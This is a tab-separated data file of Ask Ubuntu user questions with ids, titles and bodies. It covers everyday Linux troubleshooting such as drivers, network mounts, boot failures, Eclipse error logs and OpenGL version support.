246684	do i need any extra drivers for the realtek waves maxx audio on my dell xps 17 ?	i have a dell xps 17 ( 3d ) laptop . it has jbl speakers and a subwoofer too . it came windows pre-installed but i have linux now in it . the problem is in windows i had realtek waves maxx audio in it for better audio and stuff , how do i get that driver in ubuntu 12.04 ? is there any possibility ?
246686	how much memory does ubuntu server on a vps need ?	i 'm wondering will i be able to run ubuntu 10.04 on a vps with 256 ram , and if not , what 's the best os to run on that vps ?
246688	ubuntu virtualbox networking with mts usb modem	i have installed virtual-box in my ubuntu 12.04 and installed fedora 14 as a vm . now i need to connect to fedora vm from my host ( ubuntu ) . what i 'm trying to achieve is ssh connectivity between host and guest os . how can i setup the network . also i 'm using mts mblaze usb net-connector . do i need to install any packages or configure dns or dhcp ? i google so much but not able to succeed . any help will be appreciated . thank you : )
246690	how to use 'apt ' to get source code and then do separate compile	i want to get the source code for a project and then build it the same way that apt would . e.g . i want the working source code and be able to run 'make ' or similar command on the source . how can i do that ? specifically i want to get this source 'icedtea-6-jre-jamvm'
246691	how to configure jenkins using juju charm	i already have installed the jenkins charm . my question is how can i configure jenkins before deploy/after installation automatically ? i want to authomatically , for example , install the github plugin and set the repository without the use of jenkins manager dashboard .
246692	change the desktop appearance from my new version 12.10 to the old 10.04	i 've just upgraded my machine from 10.04 to the new 12.10 . how do i change the desktop appearance from my new version 12.10 to the old 10.04 so the rest of the family can get to grips with the pc ?
246693	wine logo appearing for every crossover application in unity	if i start an application using crossover ( or wine ) , the application will always be the wine logo instead of the application logo . this is the same independent of the application being run or using wine instead of crossover . that makes sense if the application has no logo , but it gets confusing running multiple microsoft office programs - and all of them have the same logo . the hint text for the icon is also `` wine windows program loader '' instead of `` document 1 - microsoft word '' as it should be . is there a way to configure wine/crossover to use application icons and title text ? i am using the faenza icon set . edit : i have confirmed that this issue does not occur in gnome classic .
246697	why is `` sudo touch < < some file name > > '' needed before installing certain packages ?	i 'm asked to do `` sudo touch /etc/default/google-talkplugin '' prior to installing 'google-talk plugin ' in their installation instructions
246699	does it matter if the system drive is not /dev/sda ?	i 'm adding 4 hd 's to my new server build ( ubuntu 12.10 ) and the sys drive is listed as /dev/sdb . i was n't able to find in the mobo manuals which sata port is first in line . the machine boots up ok , but i was unsure if the order ( /dev/sda , /dev/sdb ) makes a difference . thanks .
246707	does email client leave messages on gmail server by default ?	if i use pop3 and let email client autoconfig everything are copies of my messages left untouched on server ? where is the setting to change that ?
246714	eclipse freezes when emulator starts	i have downloaded the adt bundle from google developer site . when i have extracted and run the eclipse for the first time . it runs perfectly . emulator was also working fine . but after adding some previous projects which i have done in windows 7 . the eclipse starts freezing . but its only freezes when the avd is run , otherwise there is no problem i am using ubuntu 11.10 adt version v21.0.1-543035 my system is 32 bit following is the log file during the last attempt . please explain how to fix that ! thanks in advance . ! session 2013-01-23 11:32:20.348 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=v21.0.1-543035 java.version=1.6.0_23 java.vendor=sun microsystems inc. bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us framework arguments : -product com.android.ide.eclipse.adt.package.product command-line arguments : -os linux -ws gtk -arch x86 -product com.android.ide.eclipse.adt.package.product ! entry org.eclipse.osgi 4 0 2013-01-23 11:32:21.586 ! message frameworkevent error ! stack 0 java.util.zip.zipexception : exception in opening zip file : /home/arise/downloads/android/adt-bundle-linux-x86/eclipse/plugins/com.android.ide.eclipse.adt_21.0.1.2012-12-6-2-58.jar at org.eclipse.osgi.framework.util.secureaction.getzipfile ( secureaction.java:287 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundlefile.basicopen ( zipbundlefile.java:87 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundlefile.getzipfile ( zipbundlefile.java:100 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundlefile.checkedopen ( zipbundlefile.java:73 ) at org.eclipse.osgi.baseadaptor.bundlefile.zipbundlefile.getentry ( zipbundlefile.java:245 ) at org.eclipse.osgi.baseadaptor.basedata.getentry0 ( basedata.java:114 ) at org.eclipse.osgi.baseadaptor.basedata.getentry ( basedata.java:105 ) at org.eclipse.osgi.internal.baseadaptor.adaptorutil.loadmanifestfrom ( adaptorutil.java:187 ) at org.eclipse.core.runtime.internal.adaptor.eclipsestoragehook.getgeneratedmanifest0 ( eclipsestoragehook.java:410 ) at org.eclipse.core.runtime.internal.adaptor.eclipsestoragehook.getgeneratedmanifest ( eclipsestoragehook.java:397 ) at org.eclipse.core.runtime.internal.adaptor.eclipsestoragehook.createcachedmanifest ( eclipsestoragehook.java:392 ) at org.eclipse.core.runtime.internal.adaptor.eclipsestoragehook.getmanifest ( eclipsestoragehook.java:512 ) at org.eclipse.osgi.internal.baseadaptor.basestorage.loadmanifest ( basestorage.java:316 ) at org.eclipse.osgi.internal.baseadaptor.bundleinstall.begin ( bundleinstall.java:82 ) at org.eclipse.osgi.framework.internal.core.framework.installworkerprivileged ( framework.java:942 ) at org.eclipse.osgi.framework.internal.core.framework $ 1.run ( framework.java:846 ) at org.eclipse.osgi.framework.internal.core.framework $ 1.run ( framework.java:1 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.osgi.framework.internal.core.framework.installworker ( framework.java:905 ) at org.eclipse.osgi.framework.internal.core.framework.installbundle ( framework.java:841 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.installbundle ( bundlecontextimpl.java:137 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.installbundle ( bundlecontextimpl.java:131 ) at org.eclipse.equinox.internal.simpleconfigurator.configapplier.installbundles ( configapplier.java:197 ) at org.eclipse.equinox.internal.simpleconfigurator.configapplier.install ( configapplier.java:89 ) at org.eclipse.equinox.internal.simpleconfigurator.simpleconfiguratorimpl.applyconfiguration ( simpleconfiguratorimpl.java:129 ) at org.eclipse.equinox.internal.simpleconfigurator.simpleconfiguratorimpl.applyconfiguration ( simpleconfiguratorimpl.java:143 ) at org.eclipse.equinox.internal.simpleconfigurator.activator.start ( activator.java:48 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl $ 1.run ( bundlecontextimpl.java:711 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:702 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.start ( bundlecontextimpl.java:683 ) at org.eclipse.osgi.framework.internal.core.bundlehost.startworker ( bundlehost.java:381 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.resume ( abstractbundle.java:390 ) at org.eclipse.osgi.framework.internal.core.framework.resumebundle ( framework.java:1177 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.resumebundles ( startlevelmanager.java:559 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.resumebundles ( startlevelmanager.java:544 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.incfwsl ( startlevelmanager.java:457 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.dosetstartlevel ( startlevelmanager.java:243 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.dispatchevent ( startlevelmanager.java:438 ) at org.eclipse.osgi.framework.internal.core.startlevelmanager.dispatchevent ( startlevelmanager.java:1 ) at org.eclipse.osgi.framework.eventmgr.eventmanager.dispatchevent ( eventmanager.java:230 ) at org.eclipse.osgi.framework.eventmgr.eventmanager $ eventthread.run ( eventmanager.java:340 ) caused by : java.util.zip.zipexception : error in opening zip file at java.util.zip.zipfile.open ( native method ) at java.util.zip.zipfile. < init > ( zipfile.java:131 ) at java.util.zip.zipfile. < init > ( zipfile.java:148 ) at org.eclipse.osgi.framework.util.secureaction.getzipfile ( secureaction.java:274 ) ... 41 more
246717	what desktop environment should i choose for gaming ?	i 'm finally getting rid of windows for good . now i 'm looking for a good desktop environment for gaming performance . which desktop environments are best for gaming ? do some environments have features that make them more suitable for gaming ?
246718	change environment variables in debian/rules according to debian/control targets	i have this package mypackage which is already bundled for ubuntu . for setting the compiler , debian/rules contains deb_configure_script_env += cc=gcc i would now like to extend the package in that i would like to add more targets in debian/control , namely libmypackage-openmpi , libmypackage-mpich2 and so forth . the only thing that would theoretically need changing in debian/rules is the compiler line above ; deb_configure_script_env += cc=mpicc is there a way in debian/rules to if-`else between the build targets and set deb_configure_script_env dynamically ? if not , what 's the appropriate way to deal with this ?
246724	can i restore backup made using ubuntu to a new operating system ?	i have backed up some contents of my home directory to a usb hard drive using ubuntu 's built-in backup program . is it possible to perform a clean installation of ubuntu , then restore the contents of my home directory using the backup copies stored on the usb drive ? is it possible to perform a clean installation of another operating system in which dejadup can be installed ( for example , debian ) , then restore the contents ?
246727	chkrootkit findings - what to do ?	after my ubuntu runs slower and slower and google regularly asks me for prooving to be human , i had chkrootkit running . here 's what it found : wlan0 : packet sniffer ( /sbin/wpa_supplicant [ 870 ] , /sbin/dhvlient [ 1237 ] ) searching for suspicious files and dirs , it may take a while âś the following suspicious files and directoris were found : /usr/lib/jvm/.java-1.6.0-openjdk-i386.jinfo /usr/lib/python2.7/dist-packages/pyqt4/uic/widget-plugins/.noinit /usr/lib/pymodules/python2.7/.path since i have no idea what to do with this : what do i do with this ? thnx for responding ,
246728	can not get linux to boot from usb	this is my first time trying to install linux . any help is greatly appreciated . i have tried two different linux distos as well as two different programs to create the usb live key and have tried to install on three different computers at home and get similar results each time . i am able to get the computer to start the boot process for linux but it always runs into an error before i get into a gui . i 'll try my best to describe what i see : a purple ubuntu screen comes up followed by a screen with scrolling text and then what i 'm presuming to be an error screen with lines of smaller text than was on the previous screen . on this screen i always see : [ 40.9760231 usb 1-8 reset high speed usb device number 4 using ehci_hcd and ... udevd [ 110 ] : timeout : killing '/sbin/blkid -o udev -p /dev/sdb ' [ 120 ] which repeats itself infinitely after a while . i have tried booting linux on two different dell inspiron 1545 's as well as an old dell optiplex gx620 tower . the two aforementioned lines were common to all machines . i 've tried to troubleshoot for myself for two days and have come up with nothing . i think it 's because i 'm so new to this that i do n't even know how to ask the right questions . i 'm really excited about breaking into the linux community so this is really frustrating
246729	how to set up vpn ?	i am currently in a country where i ca n't access some social sites like meetme.com and other sites . since i am totally new to ubuntu i do n't know how to setup a vpn . i searched a lot in software-center but i could n't find any vpn software . and i do n't know which vpn to use . i tried using hotspot shield ( .exe ) with wine but it does n't work and it opens in the bottom right corner a white window
246732	how do i fix a calc error message `` filled cells can not be shifted beyond the sheet ? ''	in libre calc , when i try to insert a row , i get the message , `` filled cells can not be shifted beyond the sheet . '' this message makes me think that the file `` thinks '' there is data way out to `` infinity '' in this spreadsheet . in actuality , i 'm only using three columns which easily fit on a standard 8.5x11 inch paper . how do i fix the spreadsheet so i can insert rows ?
246733	problem with connecting to some of wireless networks in ubuntu 12.10	i 've recently instaled ubuntu 12.10 on my lenovo ideapad y570 , and i have a big problem with connecting to some of the wireless networks . so , the one at my home is working just fine , as well as my mobile phone hotspot ( both secured with wap/wap2 personal , and wpa ( tkip ) ) , but when i 'm going to the library and try to connect with unsecured network there network manager , after few seconds of trying , is giving me info that i 've gone offline . so i thought that it 's security problem , but when i changed mobile hotspot to no-secured i 've connected to it without any problem . what i 've also discovered is that networks which i ca n't connect `` looks '' different in connection manager ( screen attached ) . lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108 [ geforce gt 555m ] [ 10de:0deb ] ( rev ff ) 07:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57781 gigabit ethernet pcie [ 14e4:16b1 ] ( rev 10 ) 08:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0084 ] 09:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) 0a:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2392 ] ( rev 30 ) 0a:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2391 ] ( rev 30 ) 0a:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2393 ] ( rev 30 ) 0a:00.4 system peripheral [ 0880 ] : jmicron technology corp. xd host controller [ 197b:2394 ] ( rev 30 ) lshw -class network *-network description : ethernet interface product : netlink bcm57781 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 10 serial : b8:70 : f4:4b:6d:8e capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 firmware=sb latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : f1800000-f180ffff memory : f1810000-f181ffff memory : f1820000-f18207ff *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 00 serial : 74 : e5:0b:51 : e0:34 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-22-generic firmware=39.31.5.1 build 35138 ip=192.168.1.106 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : f1b00000-f1b01fff link to screen from network-manager ( i ca n't post pictures ) screen i can not connect to the left one ( which have security as a second card ) on the right everything works fine ( security is the last card ) i will gladly provide any additional data that will be required . also i must ask for a precise , step by step solutions , as i 'm a linux newbie .
246735	my printers only print out blank pages	i 've just installed 12.10 - very good - all appears well , network connectivity is good - i can connect to devices on my network without issue . i have two printers - a local hp officejet 4500 and a networked ricoh aficio mp 2050 . when a test print is sent to the hp 4500 it prints a blank and then i get an out of paper error even though paper is present . when a test print is sent to the ricoh printer it prints lots of blanks - this is a real pain as the networked printer is elsewhere in the building and by the time i get there its used almost a full pack of paper . the only way to stop the ricoh printing blanks is to pull the plug and then deal with the paper jams . i 've tried both the drivers which ubuntu finds and a generic postscript driver on each printer without success . i 've previously used a variety of linux mint distros without this issue . anyone any ideas ? thanks
246737	how can i mount remote folder on d-link 320 automatic ?	i have a d-link 320 nas server with my movies and musics on there . how can i mount it automatic on login ? iâ´m using ubuntu 12.04 on ultrabook samsung series 5 . the path for my data is : //192.168.254.7/volume_1/musicas //192.168.254.7/volume_1/filmes how would the exact line i have to add to fstab look like ? thanks guys ! !
246739	no option to install ubuntu from usb	i 've finally decided to delve into the world of linux , however i 'm already experiencing problems before the installation . i followed the instructions to put ubuntu on a usb stick . it is on there and it fires up when i open it but i only have 2 options : 'demo and full installation ' and 'learn more ' rather than then the 3 in the instructions . when i click demo and full installation it resets my computer but doesnt give me an option to install ubuntu upon reboot . any help would be great .
246743	i have ubuntu 12.10 . boot error mount /	1 ) power on 2 ) bios 3 ) grub 4 ) select ubuntu 5 ) an error occurred while mounting / . press s to skip mounting or m for manual recovery what do i do when this happens ? this is the first time i 've used ubuntu .
246747	icon for indicator-cpufreq using faenza icon theme	i installed indicator-cpufreq but it does n't work with the faenza icon theme . is there a way to make the indicator use the icon from the ubuntu-mono-dark icon theme ?
246755	how to get encrypted home mounted automatically after crash ?	just few days after reinstalling ubuntu ( see how to unencrypt encrypted home directory ? ) i found my pc showing weird error messages in console ( something about read/write access ) . i rebooted it , checked disk from under usbstick , it was ok , ran apt-get update , apt-get upgrade , rebooted and got it loading , but stopping with showing `` the system is running in low graphics mode '' bla bla . when i switch to console ( ctrl+shift+f1 ) i see that encrypted home is not mounted so i guess it just ca n't find graphic configs . i still can mount it with ecryptfs-mount-private and i hope if i manage to get home mounted automatically graphics will start . there are posts saying that there is an option defined at /etc/pam.d/ , but how exactly it should be enabled ? ca n't find it . thank you !
246757	where are unauthorized sudo attempts reported to	where are unauthorized sudo attempts reported to ? when you attempt to use sudo , and are not allowed , a message says that the attempt will be reported . is this only reported in var/log/auth.log ? or is there another place ? the reason i ask , is because the log contains so much that it 's not a very good way of viewing often .
246758	has the software selection changed in the server installation ?	i 've installed ubuntu server about half a year ago and i accidentally chmoded a+rwx / ( yep not a good idea ) . so i downloaded the 12.04.1 and the software selection section of the installation has changed . before it included lots of packages while now it 's only 8 i think . so am i mistaken and it have n't been changed or was it changed and if it was is there any way of getting the old one back ?
246771	returning packages to default	is there a way to make my system go back to how it was when first installed ubuntu without doing the standard installation again ? i want my packages , repositories , configuration files to go back to how it was when ubuntu 12.04 lts was first installed . is that possible ?
246772	unable to use/mount/initialize/format ipod in ubuntu	i was given an ipod touch 2g by a friend . used it for awhile on its own , but wanted to link it to my computer . tried gtkpod & rythymbox for mounting/syncing ipod with ubuntu , but there always comes a pt . where something fails or simply does n't exist as the instructions say , and then i 'm lost , as i am essentially computer illiterate ( a friend set up ubuntu for me , but he does n't know mp3s ) so i 'wiped ' it by clicking 'reset all settings ' . now it 's useless . touch screen shows a usb cord aiming at itunes logo . so , what to do ? currently , when my computer asks if i want to initialize ipod , and i click ok , i get this error message : dbus error org.freedesktop.dbus.error.invalidargs : mountpoint already registered my computer is using lucid lynx ps - unclear on distinction among sync , mount & initialize ...
246776	conky transparency not working	i 've recently upgraded to ubuntu 12.10 and since then conky has been acting up . this is what it looks after a while ( specially if i use the option 'show desktop ' by draggin the mouse to a corner , as ubuntu tweak permits you to do ) : this is my .conkyrc file and my ~/.conky/bargraph_small.lua file . i tried tweaking the setting around but it seems a bit random , at times it will work and at times it will not . any ideas ? cheers .
246778	libreoffice-writer styles/templates	i 'm looking for different sets of styles ( colorsheme , headings , bullet lists , etc ... ) for libreoffice . i need , what is called themes in ms office : i know , styles ca n't be imported , but actually they can be embedded in templates ! i know how to create/change a style by myself , but i also know how hard it is to create a good looking , coherent style with nice typography , color-palette and spacings . that 's why i 'm looking for templates with ready-to-go set of styles . a very good example for what i 'm looking for is this template : sadly , it 's the only one i found , yet . i already checked the repositories templates.libreoffice.org and templates.openoffice.org
246779	not using a proxy but still getting `` something wicked happened resolving.. '' error	i 've been searching online for the last few days and have found many people with the same error but none with answers that fix mine as i 'm not using a proxy : ( when i run apt-get update i get the following error : something wicked happened resolving 'http-proxy:8080 ' ( -5 - no address associated with hostname ) i went to /etc/apt/apt.conf and this was written in it : acquire : :http : :proxy `` http : //http-proxy:8080 '' ; it 's complaining about this proxy it seems , but there is no proxy set on my home network ! i deal with proxies at work so know how to get around them , but i deleted the entry from apt.conf and this still did n't help .
246787	how to see nat table for virbr0 ?	how can i check the nat table for virbr0 ? i can see pings heading to the host ip , but i get destination host unreachable . ping 192.168.10.151 ping 192.168.10.151 ( 192.168.10.151 ) 56 ( 84 ) bytes of data . from 192.168.10.100 icmp_seq=1 destination host unreachable 192.168.10.100 host ( br0 interface ) 192.168.10.151 guest virbr0 ip : 192.168.11.149
246795	nano syntax highlighting colors	where can i find a complete list of supported colors used in syntax highlighting for the gnu nano text editor ? i 've looked through the man pages , and it gave the syntax for defining syntax coloring , but did n't provide a color reference .
246800	keyboard not working properly when remoting into ubuntu 12.10 via tightvnc	i have an interesting problem that i ca n't seem to fix . i am running into the problem outlined here and there is a solution posted by user ecadman . however , the steps to fix it are : alt+f2 gconf-editor /- > app- > metacity- > global_keybindings change the assigned keystroke for show_desktop from super+d to ctrl+d or ctrl+alt+d or disabled . and i do not have a global_keybindings folder under metacity . i also am missing a gnome_settings folder under apps , which was another workaround . other notable problems , all keyboard related , are : i can not access the keyboard layout settings , and the on-screen keyboard has all question marks over the letters and says x keyboard can not be found , retrying on the spacebar . other than the d key not causing input and instead triggering the shortcut , the rest of the keyboard works fine . i even went into the keyboard settings in both gnome and ibus and disabled the hide all windows shortcut ( in gnome settings ) and tried to disable the d key from triggering shortcuts ( in ibus settings ) . i 'm not really sure where to go from here . it 's a standard en-us keyboard . i also do not have local access to this machine , but do have full ssh access and can add whatever else i need if necessary .
246803	how to make a juju relation between rails and mongodb ?	the juju charm of mongodb does have support for which relations ? is possible to make a relation between rails and mongodb ?
246806	to use the license of ubuntu font face , what specifically i have to cite in my website ?	i want to use the fonts available in http : //font.ubuntu.com/ in my personal website , but i dont know what text i have to include in `` legal information & notices '' section of my website . i have found this but i have doubt if are this text , part of this , or another . thank you : )
246807	what is creating a folder named `` .mediaartlocal '' in all my music folders ?	i was looking through my music collection while hidden files were shown , and i noticed that almost every directory/album has a folder in it named mediaartlocal , which contains a jpg file with an album cover thumbnail , having a name such as : album-04594560ae5c3bbc152fbfde3adfd187-3386aee33491e940685b7aacf3efa852.jpeg about 40k size . it might be from google 's play music app , to perhaps locally cache the album covers , mainly because it 's the only app i can think of that might want to do this kind of thing . but before i delete them all , i 'd like to know where they come from .
246810	can gedit plugins work in sublime text 2 ?	is there a way to get the gedit-dash plugin working in sublime text2 ? here is a screenshot of gedit-dash
246811	installing ubuntu 10.04 on a new windows 8 asus laptop	i need to install ubuntu 10.04 on a new asus windows 8 laptop ( s300 ) . i need to do this for a development project which required that specific version . i have successfully been able to install 12.10 from a usb stick . but if i try the same process using 10.04 it the machine ignores the usb stick even when i am explicitly booting from it and goes straight to booting windows . i think it has something to do with efi / uefi on newer machines , since any installation guides demand 12.10 as a pre-requisite for efi systems . i am not fluent in linux or windows 8 and i am stuck . is it in anyway possible to accomplish this or am i out of luck ? any help / advice would be hugely appreciated . thanks in advance . tjm
246827	restore fonts in 12.10	before 12.10 i was used to restore fonts just by deleting the ~/fonts.conf file and ~/fontconfig folder . i can not locate those two files anymore in 12.10 and deleting ~/.cache/fontconfig/ does n't help . i have ugly fonts on chrome after installing kubuntu-desktop . how can i restore the fonts ?
246829	problems auto-mounting samba/cifs share with fstab	i have been following the same tutorial that everyone else is referencing . my fstab entry is exactly like in the tutorial with changes to actual location . i keep getting the error mount : only root can mount //freenas/server on /media/server this is the most irritating thing i run into time and time again with running ubuntu . i have had a freenas box with a single hard drive in it for almost 4 years . i had my server mounted correctly a month ago but i started from scratch again . the server is functioning normally as i have another ubuntu box running xbmc perfectly fine . i am running ubuntu 12.10 but get the same message with 12.04 . i have installed cifs-utils and smbnetfs from terminal after installing samba from the software center . this is how i got it running last time . the workgroup in samba matches my network workgroup . i do n't have any credentials to check with the share as it is setup as guest . i ca n't browse the network as it keeps giving me a timeout error . i also ca n't open my share from nautilus by hitting ctrl+l and manually typing my server share ( //freenas/server ) . edit 1 : i 'm able to browse my network but still am getting the error message ? edit 2 : i 'm able to mount the share after testing the individual options one my one . it seems that using codepage=unicode was causing the problem . my fstab entry now looks like : //freenas/media /home/charles/server cifs guest , iocharset=utf8 , uid=1000 0 0 edit 3 : i can only mount using only `` guest '' for options ? last time i ran into an issue of not being able to open files on other computers that originated from my ubuntu machine ? last edit : i had to force my freenas server ( version : 0.7.2.5543 ) to have the same permissions as ubuntu , gid=1000 for uid=1000 . also freenas by default creates a guest user account ftp with a null password . with these three items and adding my freenas ip address to /etc/hosts i 'm up and running . sorry for the super long delay closing this question but i greatly appreciate the help ! fstab entry : //freenas/media /home/charles/server cifs username=ftp , password= , uid=1000 0 0
246832	how do i troubleshoot `` no medium found '' error on installation on mac ?	specifically , it says /init : line 7 : ca n't open /dev/sdb : no medium found i 'm trying to install ubuntu 12.10 on my intel imac . i have 1 mac partition , 1 fat32 partition with windows installed on it , and 2 ms-dos ( fat ) partitions which have nothing on them yet , if that helps . i am using refit
246835	problem running lucius using wine	my problem is i can not run lucious properly on my computer , i have installed the latest drivers for my graphics card ( geforce gt430 2gb ) and in the game called lucius , in wine , i get this error : error ca n't set new display mode : reset_device_reset_failed cant ' set old display mode : reset_device_reset_failed
246839	how do i install quanta plus ?	i want to install the quanta plus , a web development ide . when i try to configure the file using ./configure then this will display : subhajit @ reaper : ~/downloads/kdewebdev-3.5.8 $ ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking for -p flag to install ... yes checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for kde-config ... not found configure : error : the important program kde-config was not found ! please check whether you installed kde correctly . i find some stuff like sudo apt-get install kdelibs5-dev and sudo apt-get build-dep kstars but this is not working . if there is another way to install the quanta plus ? then please tell me how to install . i 'm using ubuntu 12.04 32bit .
246846	trying to install on xp and does n't come up in boot menu	i installed ubuntu inside windows xp using the wubi installer . but when i reboot and try to select ubuntu , i can not do so ; when i press f12 , it does n't come up on the boot menu as a choice .
246847	how do i bootstrap cfengine on ubuntu server	i 'm trying to use the cfengine version in the ubuntu repositories rather than download the cfengine-community repository , because the ubuntu repository has binaries for armhf . however , i 'm having a difficult time bootstrapping . on the cfengine-community version of cfengine , ( and according to any available documentation ) running cf-agent -- bootstrap -- policy-server < ip.of.server > would make the client machine pull in updates from the policy server . on ubuntu , that same command does absolutely nothing . any ideas ?
246848	how to install a web app after dismissing it initially ?	there are some web apps that i decided not to install initially ; i selected `` do not ask again '' for the prompt . now that i have changed my mind , how do i go about installing that web app for a particular browser ?
246857	ca n't format usb drive	i have a 4 gig usb drive that i 'd like to format . i go to the disk utility , and try to format it , but it says that the device is busy . ( this same error occurs no matter whether i tried to format the whole drive , or just the partition . ) so , i do some research , and figured out how to disable automount . it 's now disabled . to be on the safe side , i first unplug then reconnect the usb stick then tried : sudo umount /dev/sdb sudo umount /dev/sdb1 sudo umount /dev/sdb* now , the disk utility still gives me the same error - usually `` /dev/sdb is busy '' or `` /dev/sdb1 is mounted '' or similar .
246868	i used the bootable usb and now cant use 7	well i wanted to partition my drive so that i can get ubuntu and windows 7 on my laptop . i made a bootable usb but wasnt able to complete the process and now my computer wont boot up . need help
246869	glsl 3.30 is not supported ( ubuntu 12.04 , intel hd graphics 3000 and nvidia graphics with optimus )	the system : dell latitude e6520 video card intel速 hd graphics 3000 nvidia速 nvstm 4200m ( ddr3 512mb ) discrete graphics with optimus ubuntu 12.04 i installed bumblebee . i installed pyopengl and am following the tutorial ( http : //pyopengl.sourceforge.net/context/tutorials/shader_1.xhtml ) result on python says : runtimeerror : ( 'shader compile failure ( 0 ) : 0:1 ( 10 ) : error : glsl 3.30 is not supported . supported versions are : 1.00 es , 1.10 , 1.20 , and 1.30\n\n ' , [ ' # version 330\n void main ( ) { \n gl_position = gl_modelviewprojectionmatrix * gl_vertex ; \n } ' ] , gl_vertex_shader ) i know nvidia graphics with optimus can not be supported on ubuntu . but i think intel graphics should support the latest version of opengl . ( 1 ) what should i do ? can i update something like drivers to make intel graphics support the glsl 3.30 ? ( 2 ) if i can not , how can i use lower version of opengl in pyopengl ? on http : //pyopengl.sourceforge.net/ , it writes : pyopengl 3.0.2 includes support for : opengl v1.1 through 4.3 so there would be an option to set opengl at a lower version . but i failed to find the way to do it . help ! ! thanks in advance ! [ update ] ( 1 ) so there would be an option to set opengl at a lower version . but i failed to find the way to do it . i found the option in the code . need to specify the version ; of course , consequently some code too . ( 2 ) from the wiki/glsl # versions , the corresponding glsl versions are glsl version opengl version 1.30.10 3.0 1.40.08 3.1 1.50.11 3.2 3.30.6 3.3 so it seems intel graphics 3000 support opengl version 3.0 . i went to the intel official website and linux driver website , fail to find the answer . ( drivers for linux* ( i am not allowed to post more than 2 links : ( linux graphics https : //01.org/linuxgraphics/search/node/hd % 20graphics % 203000 ) but now i almost know i will use opengl 3.0 and only follow tutorials for opengl 3.0. who could recommend good ones ?
